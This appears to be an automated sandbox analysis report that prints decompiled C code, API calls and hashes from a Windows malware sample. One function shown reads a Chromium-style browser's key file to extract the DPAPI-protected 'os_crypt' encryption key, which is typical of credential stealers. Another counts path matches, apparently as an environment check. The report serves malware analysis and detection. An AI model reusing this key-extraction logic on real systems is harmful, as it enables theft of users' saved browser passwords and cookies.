                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 93%
                                                                                			E0040E608(CHAR* __ebx, void* __edi, void* __esi) {
                                                                                				signed int _v8;
                                                                                				char _v72;
                                                                                				intOrPtr _v124;
                                                                                				char* _v128;
                                                                                				void* _v132;
                                                                                				signed int _t11;
                                                                                				int _t20;
                                                                                				char* _t21;
                                                                                				void* _t26;
                                                                                				void* _t27;
                                                                                				void* _t28;
                                                                                				signed int _t29;
                                                                                
                                                                                				_t28 = __esi;
                                                                                				_t27 = __edi;
                                                                                				_t23 = __ebx;
                                                                                				_t11 =  *0x447674; // 0x4124c941
                                                                                				_v8 = _t11 ^ _t29;
                                                                                				E00427E30( &_v72, 0, 0x40);
                                                                                				E00427E30( &_v132, 0, 0x3c);
                                                                                				_v128 =  &_v72;
                                                                                				_v132 = 0x3c;
                                                                                				_v124 = 0x40;
                                                                                				_t20 = InternetCrackUrlA(__ebx, lstrlenA(__ebx), 0x10000000,  &_v132);
                                                                                				_t21 = _v128;
                                                                                				if(_t20 == 0) {
                                                                                					_t21 = "http";
                                                                                				}
                                                                                				return E0041DEB4(_t21, _t23, _v8 ^ _t29, _t26, _t27, _t28);
                                                                                			}
















                                                                                APIs
                                                                                • _memset.LIBCMT ref: 0040E623
                                                                                • _memset.LIBCMT ref: 0040E630
                                                                                • lstrlenA.KERNEL32(?,10000000,?), ref: 0040E656
                                                                                • InternetCrackUrlA.WININET(?,00000000,?,10000000), ref: 0040E65E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _memset$CrackInternetlstrlen
                                                                                • String ID: <$@$http
                                                                                • API String ID: 3332450456-26727890
                                                                                • Opcode ID: 3c07f5136c2212134578f3be1db12c889cabb7cfc9517224c5ff93190045ad1f
                                                                                • Instruction ID: a1fab18151acf50d00da9c05d04658c4d4dae75c64f1ef6e70972835663979f5
                                                                                • Opcode Fuzzy Hash: 3c07f5136c2212134578f3be1db12c889cabb7cfc9517224c5ff93190045ad1f
                                                                                • Instruction Fuzzy Hash: 1701E671E402089BEB10DFE5DD46FAEB7BCAB14708F900469F605F7181D778A9048B69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 64%
                                                                                			E004137F9(void* __ebx, void* __ecx, char* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                				intOrPtr* _t71;
                                                                                				WCHAR* _t77;
                                                                                				signed char _t78;
                                                                                				void* _t90;
                                                                                				void* _t96;
                                                                                				intOrPtr _t97;
                                                                                				char* _t104;
                                                                                				void* _t106;
                                                                                				void* _t113;
                                                                                				void* _t119;
                                                                                				void* _t120;
                                                                                				void* _t122;
                                                                                
                                                                                				_t104 = __edx;
                                                                                				E004219DE(E0043730B, __ebx, __edi, __esi);
                                                                                				 *((intOrPtr*)(_t119 - 0x268)) =  *((intOrPtr*)(_t119 + 8));
                                                                                				 *((intOrPtr*)(_t119 - 0x26c)) =  *((intOrPtr*)(_t119 + 0xc));
                                                                                				_t106 = __ecx;
                                                                                				 *((intOrPtr*)(_t119 - 0x260)) = 0;
                                                                                				 *((intOrPtr*)(_t119 - 0x25c)) = 0;
                                                                                				E00427E30(_t119 - 0x220, 0, 0x104);
                                                                                				_t96 = 0x1c;
                                                                                				E00417B4D(_t96);
                                                                                				 *0x44a1b8(_t119 - 0x220, _t106, _t119 - 0x220, 0x264);
                                                                                				E00427E30(_t119 - 0x118, 0, 0x104);
                                                                                				_t122 = _t120 + 0x18;
                                                                                				 *0x44a1b8(_t119 - 0x118, _t119 - 0x220);
                                                                                				 *0x44a1b8(_t119 - 0x118, "\\");
                                                                                				 *0x44a1b8(_t119 - 0x118,  *0x449cf8);
                                                                                				_t71 = _t119 - 0x118;
                                                                                				 *((intOrPtr*)(_t119 - 0x228)) = 0xf;
                                                                                				 *((intOrPtr*)(_t119 - 0x22c)) = 0;
                                                                                				 *((char*)(_t119 - 0x23c)) = 0;
                                                                                				_t113 = _t71 + 1;
                                                                                				do {
                                                                                					_t97 =  *_t71;
                                                                                					_t71 = _t71 + 1;
                                                                                					_t126 = _t97;
                                                                                				} while (_t97 != 0);
                                                                                				E00403A16(_t119 - 0x23c, _t126, _t119 - 0x118, _t71 - _t113);
                                                                                				 *(_t119 - 4) = 0;
                                                                                				_t77 = E004175C4(_t119 - 0x23c, _t119 - 0x258);
                                                                                				if(_t77[0xa] >= 8) {
                                                                                					_t77 =  *_t77;
                                                                                				}
                                                                                				_t78 = GetFileAttributesW(_t77);
                                                                                				if(_t78 == 0xffffffff) {
                                                                                					L6:
                                                                                					 *((intOrPtr*)(_t119 - 0x264)) = 0;
                                                                                					goto L7;
                                                                                				} else {
                                                                                					 *((intOrPtr*)(_t119 - 0x264)) = 1;
                                                                                					if((_t78 & 0x00000010) == 0) {
                                                                                						L7:
                                                                                						_t114 = _t119 - 0x258;
                                                                                						E00403960(0, _t119 - 0x258, 1);
                                                                                						 *(_t119 - 4) =  *(_t119 - 4) | 0xffffffff;
                                                                                						E00402C34(_t119 - 0x23c, 1, 0);
                                                                                						_t130 =  *((intOrPtr*)(_t119 - 0x264));
                                                                                						if( *((intOrPtr*)(_t119 - 0x264)) != 0) {
                                                                                							_push(_t119 - 0x25c);
                                                                                							_push(_t119 - 0x118);
                                                                                							_t90 = E0040F7A2(0, _t119 - 0x260, 0, _t114, _t130);
                                                                                							_t131 = _t90;
                                                                                							if(_t90 == 0) {
                                                                                								E0040F708(_t119 - 0x260, _t119 - 0x25c);
                                                                                							}
                                                                                						}
                                                                                						_t115 =  *((intOrPtr*)(_t119 - 0x268));
                                                                                						E00410EAE( *((intOrPtr*)(_t119 - 0x268)), _t104, 0x43e028, _t119 - 0x220,  *((intOrPtr*)(_t119 - 0x26c)),  *((intOrPtr*)(_t119 - 0x260)),  *((intOrPtr*)(_t119 - 0x25c)));
                                                                                						_push(0);
                                                                                						_t123 = _t122 - 0x1c;
                                                                                						 *((intOrPtr*)(_t119 - 0x264)) = _t122 - 0x1c;
                                                                                						E0040410F(_t123, _t115 + 8);
                                                                                						_push( *((intOrPtr*)(_t119 - 0x26c)));
                                                                                						E00413046(_t119 - 0x220,  *((intOrPtr*)(_t119 - 0x268)),  *((intOrPtr*)(_t119 - 0x268)), _t123, _t131);
                                                                                						E0040F708(_t119 - 0x260, _t119 - 0x25c);
                                                                                						return E00421A61(_t119 - 0x220, _t119 - 0x260, _t119 - 0x25c);
                                                                                					}
                                                                                					goto L6;
                                                                                				}
                                                                                			}
















                                                                                APIs
                                                                                • __EH_prolog3_GS.LIBCMT ref: 00413803
                                                                                • _memset.LIBCMT ref: 00413838
                                                                                  • Part of subcall function 00417B4D: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,00413DBC,014A10F8,00413DBC,?,?,?,?,?,?,?), ref: 00417B63
                                                                                • lstrcat.KERNEL32(?), ref: 00413857
                                                                                • _memset.LIBCMT ref: 00413866
                                                                                • lstrcat.KERNEL32(?,?), ref: 0041387C
                                                                                • lstrcat.KERNEL32(?,00440C98), ref: 0041388E
                                                                                • lstrcat.KERNEL32(?), ref: 004138A1
                                                                                • GetFileAttributesW.KERNEL32(00000000,?,?,?), ref: 00413900
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrcat$_memset$AttributesFileFolderH_prolog3_Path
                                                                                • String ID:
                                                                                • API String ID: 1831167774-0
                                                                                • Opcode ID: 9314708ec2391b29566c0b4ecaab98350932fe833fb1522d4f63b9c0f93d808f
                                                                                • Instruction ID: 589a201fac651d41cb59c2bd0a7baf71dceb7bfaedf009a0142204bc568f4e68
                                                                                • Opcode Fuzzy Hash: 9314708ec2391b29566c0b4ecaab98350932fe833fb1522d4f63b9c0f93d808f
                                                                                • Instruction Fuzzy Hash: AC5150B1C0522CAACF20EF55DC89ADAB7B8AF04314F1041EAA549B3151DB759FC9CF54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 83%
                                                                                			E00407659(void* __esi) {
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				signed int _t27;
                                                                                				intOrPtr* _t31;
                                                                                				intOrPtr* _t45;
                                                                                				void* _t46;
                                                                                				char* _t51;
                                                                                				intOrPtr _t53;
                                                                                				void* _t54;
                                                                                				intOrPtr* _t57;
                                                                                				void* _t58;
                                                                                				void* _t61;
                                                                                				char _t62;
                                                                                				intOrPtr _t63;
                                                                                				intOrPtr* _t65;
                                                                                				void* _t66;
                                                                                				void* _t67;
                                                                                				intOrPtr* _t68;
                                                                                				void* _t69;
                                                                                				signed int _t70;
                                                                                				void* _t72;
                                                                                				void* _t73;
                                                                                
                                                                                				_t67 = __esi;
                                                                                				_t70 = _t72 - 0x18c;
                                                                                				_t73 = _t72 - 0x20c;
                                                                                				_t27 =  *0x447674; // 0x4124c941
                                                                                				 *(_t70 + 0x188) = _t27 ^ _t70;
                                                                                				_t53 =  *((intOrPtr*)(_t70 + 0x194));
                                                                                				_t65 =  *((intOrPtr*)(_t70 + 0x198));
                                                                                				if(_t53 == 0) {
                                                                                					L9:
                                                                                					_t29 =  *_t65;
                                                                                					if(_t29 == 0) {
                                                                                						L23:
                                                                                						_pop(_t66);
                                                                                						_pop(_t54);
                                                                                						return E0041DEB4(_t29, _t54,  *(_t70 + 0x188) ^ _t70, _t63, _t66, _t67);
                                                                                					}
                                                                                					_push(_t67);
                                                                                					_t68 = _t65;
                                                                                					_t57 = _t65;
                                                                                					do {
                                                                                						if(_t29 == 0x2f || _t29 == 0x5c) {
                                                                                							_t68 = _t57;
                                                                                						}
                                                                                						_t57 = _t57 + 1;
                                                                                						_t29 =  *_t57;
                                                                                					} while (_t29 != 0);
                                                                                					if(_t68 != _t65) {
                                                                                						_t69 = _t68 - _t65;
                                                                                						E00421230(_t70 - 0x80, _t65, _t69);
                                                                                						_push(_t70 - 0x80);
                                                                                						_push(_t53);
                                                                                						 *((char*)(_t70 + _t69 - 0x80)) = 0;
                                                                                						E00407659(_t69);
                                                                                						_t73 = _t73 + 0x14;
                                                                                					}
                                                                                					 *(_t70 + 0x84) = 0;
                                                                                					_pop(_t67);
                                                                                					if(_t53 != 0) {
                                                                                						E0041ECF0(_t70 + 0x84, _t53, 0x104);
                                                                                						_t73 = _t73 + 0xc;
                                                                                					}
                                                                                					_t31 = _t70 + 0x84;
                                                                                					 *((char*)(_t70 + 0x187)) = 0;
                                                                                					_t58 = _t31 + 1;
                                                                                					do {
                                                                                						_t63 =  *_t31;
                                                                                						_t31 = _t31 + 1;
                                                                                					} while (_t63 != 0);
                                                                                					E0041ECF0(_t70 + _t31 - _t58 + 0x84, _t65, 0x104 - _t31 - _t58);
                                                                                					 *((char*)(_t70 + 0x187)) = 0;
                                                                                					if(GetFileAttributesA(_t70 + 0x84) == 0xffffffff) {
                                                                                						_t29 = CreateDirectoryA(_t70 + 0x84, 0);
                                                                                					}
                                                                                					goto L23;
                                                                                				} else {
                                                                                					E0041ECF0(_t70 - 0x80, _t53, 0x104);
                                                                                					_t45 = _t70 - 0x80;
                                                                                					_t73 = _t73 + 0xc;
                                                                                					_t61 = _t45 + 1;
                                                                                					do {
                                                                                						_t63 =  *_t45;
                                                                                						_t45 = _t45 + 1;
                                                                                					} while (_t63 != 0);
                                                                                					_t46 = _t45 - _t61;
                                                                                					if(_t46 != 0) {
                                                                                						_t51 = _t70 + _t46 - 0x81;
                                                                                						_t62 =  *_t51;
                                                                                						if(_t62 == 0x2f || _t62 == 0x5c) {
                                                                                							 *_t51 = 0;
                                                                                						}
                                                                                					}
                                                                                					if(GetFileAttributesA(_t70 - 0x80) == 0xffffffff) {
                                                                                						CreateDirectoryA(_t70 - 0x80, 0);
                                                                                					}
                                                                                					goto L9;
                                                                                				}
                                                                                			}


























                                                                                APIs
                                                                                • GetFileAttributesA.KERNEL32(?,?,?,?), ref: 004076C3
                                                                                • CreateDirectoryA.KERNEL32(?,00000000,?,?,?), ref: 004076D4
                                                                                • __fassign.LIBCMT ref: 00407690
                                                                                  • Part of subcall function 0041ECF0: __mbsnbcpy_l.LIBCMT ref: 0041ED00
                                                                                • _memmove.LIBCMT ref: 00407706
                                                                                • __fassign.LIBCMT ref: 00407736
                                                                                • __fassign.LIBCMT ref: 00407768
                                                                                • GetFileAttributesA.KERNEL32(?,?,?,?), ref: 0040777E
                                                                                • CreateDirectoryA.KERNEL32(?,00000000,?,?,?), ref: 00407792
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: __fassign$AttributesCreateDirectoryFile$__mbsnbcpy_l_memmove
                                                                                • String ID:
                                                                                • API String ID: 2134100740-0
                                                                                • Opcode ID: f8c7a26ef7c2f9a89125e4f50a0f2ac06a42349a1003b8ebf5ae504ee813924d
                                                                                • Instruction ID: bc05102da5ba6990e3dd54e7094b3a5e9df3f6b73620ec68af31c080aebe20d8
                                                                                • Opcode Fuzzy Hash: f8c7a26ef7c2f9a89125e4f50a0f2ac06a42349a1003b8ebf5ae504ee813924d
                                                                                • Instruction Fuzzy Hash: BB412B718042485ADF20DF6C9CC8BEA3BACAF16314F54057AE945D72C2DF79AA0C8765
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 98%
                                                                                			E00409245(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                				void* _t40;
                                                                                				intOrPtr* _t61;
                                                                                				void* _t106;
                                                                                				void* _t107;
                                                                                				signed int _t113;
                                                                                				signed int _t114;
                                                                                				void* _t115;
                                                                                
                                                                                				_t107 = __ecx;
                                                                                				_push(0x20);
                                                                                				E004219DE(E004362DF, __ebx, __edi, __esi);
                                                                                				_t113 = _t115 - 0x2c;
                                                                                				 *((intOrPtr*)(_t115 - 4)) = 0;
                                                                                				_t106 = 0;
                                                                                				E0040410F(_t113, _t115 + 8);
                                                                                				_t40 = E0040C664(_t113, "C:\\Windows\\", 0);
                                                                                				_t114 = _t113 | 0xffffffff;
                                                                                				if(_t40 != _t114) {
                                                                                					_t106 = 1;
                                                                                				}
                                                                                				if(E0040C664(_t115 - 0x2c, "C:\\\\Windows\\", 0) != _t114) {
                                                                                					_t106 = _t106 + 1;
                                                                                				}
                                                                                				if(E0040C664(_t115 - 0x2c, "C:\\\\\\Windows\\", 0) != _t114) {
                                                                                					_t106 = _t106 + 1;
                                                                                				}
                                                                                				if(E0040C664(_t115 - 0x2c,  *0x44a030, 0) != _t114) {
                                                                                					_t106 = _t106 + 1;
                                                                                				}
                                                                                				if(E0040C664(_t115 - 0x2c,  *0x449f90, 0) != _t114) {
                                                                                					_t106 = _t106 + 1;
                                                                                				}
                                                                                				if(E0040C664(_t115 - 0x2c,  *0x449ef0, 0) != _t114) {
                                                                                					_t106 = _t106 + 1;
                                                                                				}
                                                                                				if(E0040C664(_t115 - 0x2c,  *0x449ef4, 0) != _t114) {
                                                                                					_t106 = _t106 + 1;
                                                                                				}
                                                                                				if(E0040C664(_t115 - 0x2c,  *0x449d24, 0) != _t114) {
                                                                                					_t106 = _t106 + 1;
                                                                                				}
                                                                                				if(E0040C664(_t115 - 0x2c,  *0x449d98, 0) != _t114) {
                                                                                					_t106 = _t106 + 1;
                                                                                				}
                                                                                				if(E0040C664(_t115 - 0x2c,  *0x449f08, 0) != _t114) {
                                                                                					_t106 = _t106 + 1;
                                                                                				}
                                                                                				if(E0040C664(_t115 - 0x2c,  *0x449fb0, 0) != _t114) {
                                                                                					_t106 = _t106 + 1;
                                                                                				}
                                                                                				_t61 =  *0x448570; // 0x0
                                                                                				if( *0x448584 < 0x10) {
                                                                                					_t61 = 0x448570;
                                                                                				}
                                                                                				if(E0040CFFC(0, _t107, _t115 - 0x2c, _t61,  *0x448580) != _t114) {
                                                                                					_t106 = _t106 + 1;
                                                                                				}
                                                                                				if(E0040C664(_t115 - 0x2c,  *0x449c24, 0) != _t114) {
                                                                                					_t106 = _t106 + 1;
                                                                                				}
                                                                                				if(E0040C664(_t115 - 0x2c,  *0x449fa8, 0) != _t114) {
                                                                                					_t106 = _t106 + 1;
                                                                                				}
                                                                                				if(E0040C664(_t115 - 0x2c,  *0x449e90, 0) != _t114) {
                                                                                					_t106 = _t106 + 1;
                                                                                				}
                                                                                				if(E0040C664(_t115 - 0x2c,  *0x449be4, 0) != _t114) {
                                                                                					_t106 = _t106 + 1;
                                                                                				}
                                                                                				if(E0040C664(_t115 - 0x2c,  *0x449d08, 0) != _t114) {
                                                                                					_t106 = _t106 + 1;
                                                                                				}
                                                                                				if(E0040C664(_t115 - 0x2c,  *0x449e20, 0) != _t114) {
                                                                                					_t106 = _t106 + 1;
                                                                                				}
                                                                                				if(E0040C664(_t115 - 0x2c,  *0x449dd4, 0) != _t114) {
                                                                                					_t106 = _t106 + 1;
                                                                                				}
                                                                                				if(E0040C664(_t115 - 0x2c,  *0x449ff4, 0) != _t114) {
                                                                                					_t106 = _t106 + 1;
                                                                                				}
                                                                                				if(E0040C664(_t115 - 0x2c, "AppData\\Roaming", 0) != _t114) {
                                                                                					_t106 = _t106 + 1;
                                                                                				}
                                                                                				if(E0040C664(_t115 - 0x2c, "AppData\\Local", 0) != _t114) {
                                                                                					_t106 = _t106 + 1;
                                                                                				}
                                                                                				if(E0040C664(_t115 - 0x2c,  *0x449e7c, 0) != _t114) {
                                                                                					_t106 = _t106 + 1;
                                                                                				}
                                                                                				if(E0040C664(_t115 - 0x2c,  *0x449ed8, 0) != _t114) {
                                                                                					_t106 = _t106 + 1;
                                                                                				}
                                                                                				if(E0040C664(_t115 - 0x2c,  *0x449d5c, 0) != _t114) {
                                                                                					_t106 = _t106 + 1;
                                                                                				}
                                                                                				if(E0040C664(_t115 - 0x2c,  *0x449dd0, 0) != _t114) {
                                                                                					_t106 = _t106 + 1;
                                                                                				}
                                                                                				if(E0040C664(_t115 - 0x2c,  *0x449c20, 0) != _t114) {
                                                                                					_t106 = _t106 + 1;
                                                                                				}
                                                                                				if(E0040C664(_t115 - 0x2c,  *0x449b90, 0) != _t114) {
                                                                                					_t106 = _t106 + 1;
                                                                                				}
                                                                                				if(E0040C664(_t115 - 0x2c,  *0x449c5c, 0) != _t114) {
                                                                                					_t106 = _t106 + 1;
                                                                                				}
                                                                                				if(E0040C664(_t115 - 0x2c,  *0x449f04, 0) != _t114) {
                                                                                					_t106 = _t106 + 1;
                                                                                				}
                                                                                				E00402C34(_t115 - 0x2c, 1, 0);
                                                                                				E00402C34(_t115 + 8, 1, 0);
                                                                                				return E00421A61(_t106, 0, _t114);
                                                                                			}











                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog3_
                                                                                • String ID: AppData\Local$AppData\Roaming$C:\Windows\$C:\\Windows\$C:\\\Windows\
                                                                                • API String ID: 2427045233-1670818868
                                                                                • Opcode ID: 17c1783ad909d7d4de27cd7c22ead3794264c99a121d792d10185f3baeae4ec0
                                                                                • Instruction ID: 93343bef8a62e846269ffe94059040ae1205e855e75dfee06ea45578d30c96a3
                                                                                • Opcode Fuzzy Hash: 17c1783ad909d7d4de27cd7c22ead3794264c99a121d792d10185f3baeae4ec0
                                                                                • Instruction Fuzzy Hash: B681407490024DAADF31EBB58CC5CAF7A7CE689F08714993BF111F2192CA39DC459B68
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508759068.0000000000C61000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C60000, based on PE: true
                                                                                • Associated: 00000011.00000002.508712302.0000000000C60000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.509144454.0000000000C80000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.511051633.0000000000DA8000.00000020.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.511085555.0000000000DAC000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.511119912.0000000000DB0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_c60000_file_22613.jbxd
                                                                                Similarity
                                                                                • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                                • String ID:
                                                                                • API String ID: 3886058894-0
                                                                                • Opcode ID: 0b27fdbf409fc5229161f09896af985b0d0c712f297d7939eeedf512bcbe9c38
                                                                                • Instruction ID: 817335c902bd3c367d99a871cc26fa2e4d375b97754140bf5d796d816cab7eb9
                                                                                • Opcode Fuzzy Hash: 0b27fdbf409fc5229161f09896af985b0d0c712f297d7939eeedf512bcbe9c38
                                                                                • Instruction Fuzzy Hash: B951E371A00605EBCB209F6E884599EBBB5EF41360F28C229FC7C97191E7709F51EB50
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 86%
                                                                                			E0040F7A2(void* __ebx, intOrPtr __ecx, char* __edi, void* __esi, void* __eflags) {
                                                                                				intOrPtr _t50;
                                                                                				void* _t68;
                                                                                				char* _t74;
                                                                                				void* _t78;
                                                                                				void* _t82;
                                                                                
                                                                                				_t79 = __edi;
                                                                                				_push(0x38);
                                                                                				E004219DE(E00435FE4, __ebx, __edi, __esi);
                                                                                				 *(_t82 - 0x38) =  *(_t82 - 0x38) & 0x00000000;
                                                                                				 *((intOrPtr*)(_t82 - 0x40)) = __ecx;
                                                                                				_t81 = _t82 - 0x30;
                                                                                				_t61 = _t82 - 0x34;
                                                                                				 *((intOrPtr*)(_t82 - 0x44)) =  *((intOrPtr*)(_t82 + 0xc));
                                                                                				if(E0040F5B8(_t82 - 0x34, _t82 - 0x30,  *((intOrPtr*)(_t82 + 8))) == 0) {
                                                                                					L19:
                                                                                					return E00421A61(_t61, _t79, _t81);
                                                                                				}
                                                                                				_t61 = 0;
                                                                                				if( *((intOrPtr*)(_t82 - 0x34)) == 0) {
                                                                                					goto L19;
                                                                                				}
                                                                                				_t81 =  *(_t82 - 0x30);
                                                                                				if(_t81 == 0) {
                                                                                					goto L19;
                                                                                				}
                                                                                				_t79 = LocalAlloc(0x40, _t81 + 1);
                                                                                				if(_t79 == 0) {
                                                                                					goto L19;
                                                                                				}
                                                                                				if(_t81 <= 0) {
                                                                                					L7:
                                                                                					if(StrStrA(_t79, "\"os_crypt\":{\"encrypted_key\":\"") == _t61) {
                                                                                						goto L19;
                                                                                					}
                                                                                					_t65 = _t82 - 0x2c;
                                                                                					 *((intOrPtr*)(_t82 - 0x18)) = 0xf;
                                                                                					 *((intOrPtr*)(_t82 - 0x1c)) = _t61;
                                                                                					 *((char*)(_t82 - 0x2c)) = _t61;
                                                                                					E0040381A(_t82 - 0x2c, _t45 + 0x1d);
                                                                                					 *((intOrPtr*)(_t82 - 4)) = _t61;
                                                                                					if(E0040C664(_t82 - 0x2c, "\"}", _t61) != 0xffffffff) {
                                                                                						_t65 = _t82 - 0x2c;
                                                                                						E00403EAE(_t82 - 0x2c, _t49, 0xffffffff);
                                                                                					}
                                                                                					_t50 =  *((intOrPtr*)(_t82 - 0x2c));
                                                                                					if( *((intOrPtr*)(_t82 - 0x18)) < 0x10) {
                                                                                						_t50 = _t82 - 0x2c;
                                                                                					}
                                                                                					_t79 = _t82 - 0x3c;
                                                                                					_t61 = _t82 - 0x30;
                                                                                					if(E0040F64C(_t82 - 0x30, _t65, _t82 - 0x3c, _t50) != 0) {
                                                                                						_t75 =  *(_t82 - 0x3c);
                                                                                						_t68 = 5;
                                                                                						if( *(_t82 - 0x3c) >= _t68) {
                                                                                							_t53 =  *(_t82 - 0x30);
                                                                                							_t79 = 0x43f1d4;
                                                                                							_t81 =  *(_t82 - 0x30);
                                                                                							_t61 = 0;
                                                                                							asm("repe cmpsb");
                                                                                							if(0 == 0) {
                                                                                								_t79 = _t82 - 0x30;
                                                                                								if(E0040F6A5(_t53 + 5, _t82 - 0x30, _t75 + 0xfffffffb, _t82 - 0x34) != 0 &&  *(_t82 - 0x30) == 0x20) {
                                                                                									 *(_t82 - 0x38) = 1;
                                                                                									E0040F738( *((intOrPtr*)(_t82 - 0x44)),  *((intOrPtr*)(_t82 - 0x40)),  *((intOrPtr*)(_t82 - 0x34)));
                                                                                								}
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                					E00402C34(_t82 - 0x2c, 1, 0);
                                                                                					goto L19;
                                                                                				} else {
                                                                                					_t74 = _t79;
                                                                                					_t78 =  *((intOrPtr*)(_t82 - 0x34)) - _t79;
                                                                                					do {
                                                                                						 *_t74 =  *((intOrPtr*)(_t78 + _t74));
                                                                                						_t74 =  &(_t74[1]);
                                                                                						_t81 = _t81 - 1;
                                                                                					} while (_t81 != 0);
                                                                                					goto L7;
                                                                                				}
                                                                                			}









                                                                                APIs
                                                                                • __EH_prolog3_GS.LIBCMT ref: 0040F7A9
                                                                                  • Part of subcall function 0040F5B8: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 0040F5D3
                                                                                  • Part of subcall function 0040F5B8: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00414013,?,\Opera Stable\), ref: 0040F5EA
                                                                                  • Part of subcall function 0040F5B8: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,?,?,?,00414013,?,\Opera Stable\), ref: 0040F601
                                                                                  • Part of subcall function 0040F5B8: ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 0040F618
                                                                                  • Part of subcall function 0040F5B8: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00414013,?,\Opera Stable\), ref: 0040F640
                                                                                • LocalAlloc.KERNEL32(00000040,?,00000038,00413BCE,?,?,00000001,00000000,00000001), ref: 0040F7EF
                                                                                • StrStrA.SHLWAPI(00000000,"os_crypt":{"encrypted_key":"), ref: 0040F819
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$AllocLocal$CloseCreateH_prolog3_HandleReadSize
                                                                                • String ID: $"os_crypt":{"encrypted_key":"$DPAPI
                                                                                • API String ID: 128017991-2919755482
                                                                                • Opcode ID: 9b3d1918e5bfc1227503d4b8e889a7d3d74695d4ccf852f30a8429478e5e5886
                                                                                • Instruction ID: f3c89960bbd430be3fba1748302675d9ab0947717eec4addc5a01aa19b62930b
                                                                                • Opcode Fuzzy Hash: 9b3d1918e5bfc1227503d4b8e889a7d3d74695d4ccf852f30a8429478e5e5886
                                                                                • Instruction Fuzzy Hash: 09416C32D00209ABDF24EFA5D881ADEB7B5AF44310F60813BF511B76D1DB78594ACB98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 79%
                                                                                			E0040A83E(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                				void* _t41;
